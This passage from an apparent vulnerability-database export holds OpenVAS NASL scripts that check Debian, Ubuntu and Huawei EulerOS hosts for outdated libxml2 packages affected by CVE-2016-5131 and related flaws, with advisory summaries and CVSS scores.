res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = 
isdpkgvuln(pkg:\"libxml2-dev:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dbg:i386\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-dev:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-dev:i386\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif ((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python3-libxml2\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python3-libxml2-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:25", "description": "Several vulnerabilities were discovered\nin libxml2, a library providing support to read, modify and write XML and HTML\nfiles. 
A remote attacker could provide a specially crafted XML or HTML file that,\nwhen processed by an application using libxml2, would cause a denial-of-service\nagainst the application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.", "cvss3": {}, "published": "2016-12-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3744-1 (libxml2 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2016-4658"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703744", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703744", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3744.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3744-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703744\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\");\n script_name(\"Debian Security Advisory DSA 3744-1 (libxml2 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 00:00:00 +0100 (Fri, 23 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3744.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"libxml2 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 2.9.1+dfsg1-5+deb8u4.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2.9.4+dfsg1-2.1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.4+dfsg1-2.1.\n\nWe recommend that you upgrade your libxml2 packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered\nin libxml2, a library providing support to 
read, modify and write XML and HTML\nfiles. A remote attacker could provide a specially crafted XML or HTML file that,\nwhen processed by an application using libxml2, would cause a denial-of-service\nagainst the application, or potentially, the execution of arbitrary code with\nthe privileges of the user running the application.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-dbg:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-dev:amd64\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev:i386\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.9.1+dfsg1-5+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2:amd64\", 
ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-dbg:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dbg:i386\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-dev:amd64\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-dev:i386\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif((res = isdpkgvuln(pkg:\"libxml2-doc\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libxml2-utils-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-libxml2-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3-libxml2\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python3-libxml2-dbg\", ver:\"2.9.4+dfsg1-2.1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:37:19", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1088)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2017-16931", "CVE-2016-5131", "CVE-2017-16932"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181088", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181088", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1088\");\n script_version(\"2020-01-23T11:12:09+0000\");\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-16931\", \"CVE-2017-16932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:12:09 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:12:09 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1088)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n 
script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1088\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1088\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libxml2' package(s) announced via the EulerOS-SA-2018-1088 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.(CVE-2016-5131)\n\nparser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\nparser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.)CVE-2017-16932)\");\n\n script_tag(name:\"affected\", value:\"'libxml2' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP1\"))) {\n report += 
res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:39:00", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1156)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16931", "CVE-2016-5131", "CVE-2017-16932"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181156", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1156\");\n script_version(\"2020-01-23T11:15:29+0000\");\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-16931\", \"CVE-2017-16932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:15:29 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:15:29 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1156)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1156\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1156\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libxml2' package(s) announced via the EulerOS-SA-2018-1156 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to 
function.(CVE-2016-5131)\n\nparser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\nparser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.)CVE-2017-16932)\");\n\n script_tag(name:\"affected\", value:\"'libxml2' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for libxml2 USN-3235-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4448", "CVE-2016-5131", "CVE-2016-4658"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843097", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843097", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for libxml2 USN-3235-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843097\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 06:32:18 +0100 (Fri, 17 Mar 2017)\");\n script_cve_id(\"CVE-2016-4448\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for libxml2 USN-3235-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that libxml2 
incorrectly\n handled format strings. If a user or automated system were tricked into opening\n a specially crafted document, an attacker could possibly cause libxml2 to crash,\n resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS,\n Ubuntu 14.04 LTS, and Ubuntu 16.04 LTS. (CVE-2016-4448) It was discovered that\n libxml2 incorrectly handled certain malformed documents. If a user or automated\n system were tricked into opening a specially crafted document, an attacker could\n cause libxml2 to crash, resulting in a denial of service, or possibly execute\n arbitrary code. (CVE-2016-4658) Nick Wellnhofer discovered that libxml2\n incorrectly handled certain malformed documents. If a user or automated system\n were tricked into opening a specially crafted document, an attacker could cause\n libxml2 to crash, resulting in a denial of service, or possibly execute\n arbitrary code. (CVE-2016-5131)\");\n script_tag(name:\"affected\", value:\"libxml2 on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3235-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3235-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.1+dfsg1-3ubuntu4.9\", rls:\"UBUNTU14.04 LTS\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.1+dfsg1-3ubuntu4.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.4+dfsg1-2ubuntu0.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.4+dfsg1-2ubuntu0.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.7.8.dfsg-5.1ubuntu4.17\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.7.8.dfsg-5.1ubuntu4.17\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libxml2:i386\", ver:\"2.9.3+dfsg1-1ubuntu0.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libxml2:amd64\", ver:\"2.9.3+dfsg1-1ubuntu0.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:36:31", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1089)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16931", "CVE-2017-7375", "CVE-2017-7376", "CVE-2016-5131", "CVE-2017-16932"], "modified": 
"2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181089", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1089\");\n script_version(\"2020-01-23T11:12:11+0000\");\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-16931\", \"CVE-2017-16932\", \"CVE-2017-7375\", \"CVE-2017-7376\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", 